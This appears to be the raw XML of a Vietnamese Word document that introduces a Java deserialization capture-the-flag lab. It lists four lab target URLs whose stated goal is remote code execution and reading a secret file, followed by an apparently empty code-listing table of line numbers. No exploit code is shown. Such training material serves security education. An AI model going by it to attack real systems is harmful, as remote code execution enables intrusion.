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BE05E" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thử thách về lỗi bảo mật liên quan đến quá trình Serialize và Deserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B3CF6" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:t>Đến với thử thách liên quan đến Java Serialization và Deserialization, có 4 mục tiêu cần phải chinh phục với nhiệm vụ là </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE và đọc bí mật ở thư mục gốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E4F6E" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu 1: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AB4A72">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://java-deserialization.cyberjutsu-lab.tech:13334/java-deserialize-lv1-1.0-SNAPSHOT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C5A134A" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu 2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00AB4A72">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://java-deserialization.cyberjutsu-lab.tech:13335/java-deserialize-lv2-1.0-SNAPSHOT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36A2EB81" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu 3: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00AB4A72">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://java-deserialization.cyberjutsu-lab.tech:13336/java-deserialize-lv3-1.0-SNAPSHOT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="233183BD" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu 4: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00AB4A72">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://java-deserialization.cyberjutsu-lab.tech:13337/java-deserialize-lv4-1.0-SNAPSHOT</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D97B543" w14:textId="77777777" w:rsidR="00DA2CAB" w:rsidRPr="00AB4A72" w:rsidRDefault="00DA2CAB" w:rsidP="00DA2CAB">
      <w:r w:rsidRPr="00AB4A72">
        <w:t>Sau khi hoàn thành nhiệm vụ, bạn vui lòng nộp Flag tại: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00AB4A72">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wpt.cyberjutsu.io/challenges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DF7A272" w14:textId="178B774B" w:rsidR="00341126" w:rsidRDefault="00341126">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811A461" w14:textId="67C17BAA" w:rsidR="002B505C" w:rsidRDefault="002B505C" w:rsidP="002B505C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mục tiêu 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D0C2CE" w14:textId="77777777" w:rsidR="002B505C" w:rsidRPr="00FF23DE" w:rsidRDefault="002B505C" w:rsidP="002B505C">
      <w:r w:rsidRPr="002146CF">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702"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F23E1" w:rsidRPr="008F23E1" w14:paraId="306CD0E1" w14:textId="77777777" w:rsidTr="008F23E1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33E88BFD" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4F431F" w14:textId="53AC3E51" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACEFC47" w14:textId="11DF825E" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B10356" w14:textId="46991AED" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED9E863" w14:textId="7AAADA93" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B4F840" w14:textId="07902980" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01A4AABC" w14:textId="4094BCC9" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2536AEF6" w14:textId="251B4815" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE2E3D8" w14:textId="22A91809" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444B9798" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E181CE" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="008F23E1" w:rsidRDefault="001B7E5A" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23037458" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56930A71" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62046CE9" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED31B02" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BFF8EF" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BDE787" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6805CD" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B3688F" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719B96ED" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="008F23E1" w:rsidRDefault="001B7E5A" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08BEFCAF" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F08B09" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24129A5C" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B876D6" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B3F184" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="001B7E5A" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F29B48" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="001B7E5A" w:rsidRDefault="001B7E5A" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="469623F8" w14:textId="77777777" w:rsidR="001B7E5A" w:rsidRPr="008F23E1" w:rsidRDefault="001B7E5A" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D4545DF" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55964B96" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DE8F97" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52373C04" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C064D15" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08C7F121" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797A31F0" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDAB1CE" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E42225" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41FEDE60" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A5E928" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CEE8D08" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A53C29" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C01929E" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336260D6" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6029B660" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B466967" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174656CF" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008F23E1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007CF422" w14:textId="77777777" w:rsidR="008F23E1" w:rsidRPr="008F23E1" w:rsidRDefault="008F23E1" w:rsidP="005A6FB7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
